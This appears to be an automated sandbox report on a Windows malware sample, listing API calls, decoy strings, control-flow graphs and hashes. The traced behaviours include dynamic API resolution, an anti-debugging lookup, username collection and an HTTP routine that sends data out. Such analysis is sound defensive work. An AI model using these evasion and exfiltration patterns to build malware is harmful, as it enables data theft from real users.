                    • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 004046C7
                    • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 004046D2
                    • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 004046DD
                    • strlen.MSVCRT ref: 004046F0
                    • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404718
                    • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404723
                    • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 0040472E
                    • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404739
                    • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404744
                    • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404754
                    • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 0040475F
                    • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 0040476A
                    • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404775
                    • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404780
                    • VirtualProtect.KERNEL32(?,00000004,00000100,00000000), ref: 0040479C
                    Strings
                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004046AC
                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0040473F
                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004045DD
                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0040471E
                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404657
                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0040475A
                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404683
                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004046B7
                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004045E8
                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004045C7
                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404678
                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004046C2
                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404734
                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004045D2
                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004046CD
                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0040466D
                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404713
                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004045F3
                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404638
                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404643
                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0040477B
                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404617
                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404729
                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404765
                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404770
                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0040474F
                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404622
                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004046D8
                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404662
                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0040462D
                    Memory Dump Source
                    • Source File: 00000000.00000002.1879542620.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.1879542620.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1879542620.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1879542620.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1879542620.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1879542620.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: lstrlen$Heap$AllocateProcessProtectVirtualstrlen
                    • String ID: The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.
                    • API String ID: 2127927946-2218711628
                    • Opcode ID: 94e7660d446ef400bbca7e6a05bf8504b75a8e0329621672810e0e1d9e7bb62d
                    • Instruction ID: 5e1cd967cc1bd71f365b3ff5871be6e8d111942329c8327febd6a33c3aeace51
                    • Opcode Fuzzy Hash: 94e7660d446ef400bbca7e6a05bf8504b75a8e0329621672810e0e1d9e7bb62d
                    • Instruction Fuzzy Hash: 5841BD79740624EBC718AFE5EC8DB987F70AB4C712BA0C062F90296190C7F9D5019B3D

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 663 419860-419874 call 419750 666 419a93-419af2 LoadLibraryA * 5 663->666 667 41987a-419a8e call 419780 GetProcAddress * 21 663->667 669 419af4-419b08 GetProcAddress 666->669 670 419b0d-419b14 666->670 667->666 669->670 672 419b46-419b4d 670->672 673 419b16-419b41 GetProcAddress * 2 670->673 674 419b68-419b6f 672->674 675 419b4f-419b63 GetProcAddress 672->675 673->672 676 419b71-419b84 GetProcAddress 674->676 677 419b89-419b90 674->677 675->674 676->677 678 419bc1-419bc2 677->678 679 419b92-419bbc GetProcAddress * 2 677->679 679->678
                    APIs
                    • GetProcAddress.KERNEL32(74DD0000,024BC9B0), ref: 004198A1
                    • GetProcAddress.KERNEL32(74DD0000,024BC998), ref: 004198BA
                    • GetProcAddress.KERNEL32(74DD0000,024BC968), ref: 004198D2
                    • GetProcAddress.KERNEL32(74DD0000,024BC8C0), ref: 004198EA
                    • GetProcAddress.KERNEL32(74DD0000,024BCBC0), ref: 00419903
                    • GetProcAddress.KERNEL32(74DD0000,024B6278), ref: 0041991B
                    • GetProcAddress.KERNEL32(74DD0000,024B4D00), ref: 00419933
                    • GetProcAddress.KERNEL32(74DD0000,024B4C40), ref: 0041994C
                    • GetProcAddress.KERNEL32(74DD0000,024BCAE8), ref: 00419964
                    • GetProcAddress.KERNEL32(74DD0000,024BCB00), ref: 0041997C
                    • GetProcAddress.KERNEL32(74DD0000,024BCD28), ref: 00419995
                    • GetProcAddress.KERNEL32(74DD0000,024BCCF8), ref: 004199AD
                    • GetProcAddress.KERNEL32(74DD0000,024B4D80), ref: 004199C5
                    • GetProcAddress.KERNEL32(74DD0000,024BCDD0), ref: 004199DE
                    • GetProcAddress.KERNEL32(74DD0000,024BCC68), ref: 004199F6
                    • GetProcAddress.KERNEL32(74DD0000,024B49C0), ref: 00419A0E
                    • GetProcAddress.KERNEL32(74DD0000,024BCC80), ref: 00419A27
                    • GetProcAddress.KERNEL32(74DD0000,024BCD70), ref: 00419A3F
                    • GetProcAddress.KERNEL32(74DD0000,024B4B80), ref: 00419A57
                    • GetProcAddress.KERNEL32(74DD0000,024BCB90), ref: 00419A70
                    • GetProcAddress.KERNEL32(74DD0000,024B49A0), ref: 00419A88
                    • LoadLibraryA.KERNEL32(024BCC50,?,00416A00), ref: 00419A9A
                    • LoadLibraryA.KERNEL32(024BCB18,?,00416A00), ref: 00419AAB
                    • LoadLibraryA.KERNEL32(024BCCB0,?,00416A00), ref: 00419ABD
                    • LoadLibraryA.KERNEL32(024BCD40,?,00416A00), ref: 00419ACF
                    • LoadLibraryA.KERNEL32(024BCCC8,?,00416A00), ref: 00419AE0
                    • GetProcAddress.KERNEL32(75A70000,024BCBD8), ref: 00419B02
                    • GetProcAddress.KERNEL32(75290000,024BCD10), ref: 00419B23
                    • GetProcAddress.KERNEL32(75290000,024BCB30), ref: 00419B3B
                    • GetProcAddress.KERNEL32(75BD0000,024BCC98), ref: 00419B5D
                    • GetProcAddress.KERNEL32(75450000,024B4A20), ref: 00419B7E
                    • GetProcAddress.KERNEL32(76E90000,024B63C8), ref: 00419B9F
                    • GetProcAddress.KERNEL32(76E90000,NtQueryInformationProcess), ref: 00419BB6
                    Strings
                    • NtQueryInformationProcess, xrefs: 00419BAA
                    Memory Dump Source
                    • Source File: 00000000.00000002.1879542620.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.1879542620.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1879542620.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1879542620.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1879542620.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1879542620.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: AddressProc$LibraryLoad
                    • String ID: NtQueryInformationProcess
                    • API String ID: 2238633743-2781105232
                    • Opcode ID: 5241b63200b37b02610696a8d235fc94b134fee8225fd0051d7d8784b632fee7
                    • Instruction ID: 20ebc6b46c949eaa7f25e90fb8197bb2e58582eade08509f86bd82c1d7e4afd5
                    • Opcode Fuzzy Hash: 5241b63200b37b02610696a8d235fc94b134fee8225fd0051d7d8784b632fee7
                    • Instruction Fuzzy Hash: 55A14DBD5C4240BFE354EFE8ED889963BFBF74E301704661AE605C3264D639A841DB12

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 767 404880-404942 call 41a7a0 call 4047b0 call 41a740 * 5 InternetOpenA StrCmpCA 782 404944 767->782 783 40494b-40494f 767->783 782->783 784 404955-404acd call 418b60 call 41a920 call 41a8a0 call 41a800 * 2 call 41a9b0 call 41a8a0 call 41a800 call 41a9b0 call 41a8a0 call 41a800 call 41a920 call 41a8a0 call 41a800 call 41a9b0 call 41a8a0 call 41a800 call 41a9b0 call 41a8a0 call 41a800 call 41a9b0 call 41a920 call 41a8a0 call 41a800 * 2 InternetConnectA 783->784 785 404ecb-404ef3 InternetCloseHandle call 41aad0 call 409ac0 783->785 784->785 871 404ad3-404ad7 784->871 794 404f32-404fa2 call 418990 * 2 call 41a7a0 call 41a800 * 8 785->794 795 404ef5-404f2d call 41a820 call 41a9b0 call 41a8a0 call 41a800 785->795 795->794 872 404ae5 871->872 873 404ad9-404ae3 871->873 874 404aef-404b22 HttpOpenRequestA 872->874 873->874 875 404b28-404e28 call 41a9b0 call 41a8a0 call 41a800 call 41a920 call 41a8a0 call 41a800 call 41a9b0 call 41a8a0 call 41a800 call 41a9b0 call 41a8a0 call 41a800 call 41a9b0 call 41a8a0 call 41a800 call 41a9b0 call 41a8a0 call 41a800 call 41a920 call 41a8a0 call 41a800 call 41a9b0 call 41a8a0 call 41a800 call 41a9b0 call 41a8a0 call 41a800 call 41a920 call 41a8a0 call 41a800 call 41a9b0 call 41a8a0 call 41a800 call 41a9b0 call 41a8a0 call 41a800 call 41a9b0 call 41a8a0 call 41a800 call 41a9b0 call 41a8a0 call 41a800 call 41a920 call 41a8a0 call 41a800 call 41a740 call 41a920 * 2 call 41a8a0 call 41a800 * 2 call 41aad0 lstrlenA call 41aad0 * 2 lstrlenA call 41aad0 HttpSendRequestA 874->875 876 404ebe-404ec5 InternetCloseHandle 874->876 987 404e32-404e5c InternetReadFile 875->987 876->785 988 404e67-404eb9 InternetCloseHandle call 41a800 987->988 989 404e5e-404e65 987->989 988->876 989->988 990 404e69-404ea7 call 41a9b0 call 41a8a0 call 41a800 989->990 990->987
                    APIs
                      • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                      • Part of subcall function 004047B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 004047EA
                      • Part of subcall function 004047B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404801
                      • Part of subcall function 004047B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404818
                      • Part of subcall function 004047B0: lstrlenA.KERNEL32(00000000,00000000,0000003C), ref: 00404839
                      • Part of subcall function 004047B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00404849
                      • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                    • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00404915
                    • StrCmpCA.SHLWAPI(?,024E9120), ref: 0040493A
                    • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00404ABA
                    • lstrlenA.KERNEL32(00000000,00000000,?,?,?,?,00420DDB,00000000,?,?,00000000,?,",00000000,?,024ED4F0), ref: 00404DE8
                    • lstrlenA.KERNEL32(00000000,00000000,00000000), ref: 00404E04
                    • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00404E18
                    • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00404E49
                    • InternetCloseHandle.WININET(00000000), ref: 00404EAD
                    • InternetCloseHandle.WININET(00000000), ref: 00404EC5
                    • HttpOpenRequestA.WININET(00000000,024ED4D0,?,024ECDB8,00000000,00000000,00400100,00000000), ref: 00404B15
                      • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                      • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                      • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                      • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                      • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                      • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                    • InternetCloseHandle.WININET(00000000), ref: 00404ECF
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1879542620.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.1879542620.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1879542620.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1879542620.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1879542620.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1879542620.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Internet$lstrcpy$lstrlen$??2@CloseHandle$HttpOpenRequestlstrcat$ConnectCrackFileReadSend
                    • String ID: "$"$------$------$------
                    • API String ID: 2402878923-2180234286
                    • Opcode ID: 14af7d5969852ec007fdeec1facad88a693abf9282d8eb6001c30f70f80f375e
                    • Instruction ID: 3f466b8612cc2db17a5d9ea90efc92506b51061f54fe9a8e3d974c375c306076
                    • Opcode Fuzzy Hash: 14af7d5969852ec007fdeec1facad88a693abf9282d8eb6001c30f70f80f375e
                    • Instruction Fuzzy Hash: 10124EB1911118AADB14FB91DD92FEEB339AF14314F50419EB10672091DF382F9ACF6A
                    APIs
                    • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,004011B7), ref: 00417880
                    • HeapAlloc.KERNEL32(00000000,?,?,?,004011B7), ref: 00417887
                    • GetUserNameA.ADVAPI32(00000104,00000104), ref: 0041789F
                    Memory Dump Source
                    • Source File: 00000000.00000002.1879542620.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.1879542620.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1879542620.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1879542620.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1879542620.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1879542620.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Heap$AllocNameProcessUser
                    • String ID:
                    • API String ID: 1206570057-0
                    • Opcode ID: 98be1400a0f13b17dcfec3579e84c662f1c1c1bd9e35413721d24a5daf15813c
                    • Instruction ID: ff9f3fb77af2488786a742b30a7a77c7a6675fe12b7944dcc27658a291e6e945
                    • Opcode Fuzzy Hash: 98be1400a0f13b17dcfec3579e84c662f1c1c1bd9e35413721d24a5daf15813c
                    • Instruction Fuzzy Hash: 08F04FB5D44208AFC710DFD8DD49BAEBBB8EB05711F10025AFA05A2680C77815448BA2
                    APIs
                    • GetSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,00416A17,00420AEF), ref: 0040116A
                    • ExitProcess.KERNEL32 ref: 0040117E
                    Memory Dump Source
                    • Source File: 00000000.00000002.1879542620.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.1879542620.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1879542620.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1879542620.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1879542620.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1879542620.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: ExitInfoProcessSystem
                    • String ID:
                    • API String ID: 752954902-0
                    • Opcode ID: 5e169adc815d3d5e963ffc5450d2c06f987a57c1971b55ed15331b47ed99491e
                    • Instruction ID: a8b5f4e8781596c88644d8aa2969b9d6e82c50da38cf1cac8898b5ca04c80d98
                    • Opcode Fuzzy Hash: 5e169adc815d3d5e963ffc5450d2c06f987a57c1971b55ed15331b47ed99491e
                    • Instruction Fuzzy Hash: F4D05E7C94030CEBCB14EFE0D9496DDBB79FB0D311F001559ED0572340EA306481CAA6

                    Control-flow Graph

                    APIs
                      • Part of subcall function 004045C0: lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 004045CC
                      • Part of subcall function 004045C0: lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 004045D7
                      • Part of subcall function 004045C0: lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 004045E2
                      • Part of subcall function 004045C0: lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 004045ED
                      • Part of subcall function 004045C0: lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 004045F8
                      • Part of subcall function 004045C0: GetProcessHeap.KERNEL32(00000000,?,?,0000000F,?,004169FB), ref: 00404607
                      • Part of subcall function 004045C0: RtlAllocateHeap.NTDLL(00000000,?,0000000F,?,004169FB), ref: 0040460E
                      • Part of subcall function 004045C0: lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 0040461C
                      • Part of subcall function 004045C0: lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 00404627
                      • Part of subcall function 004045C0: lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 00404632
                      • Part of subcall function 004045C0: lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 0040463D
                      • Part of subcall function 004045C0: lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 00404648
                      • Part of subcall function 004045C0: lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 0040465C
                      • Part of subcall function 004045C0: lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 00404667
                      • Part of subcall function 004045C0: lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 00404672
                      • Part of subcall function 004045C0: lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 0040467D
                      • Part of subcall function 004045C0: lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 00404688
                      • Part of subcall function 004045C0: lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 004046B1
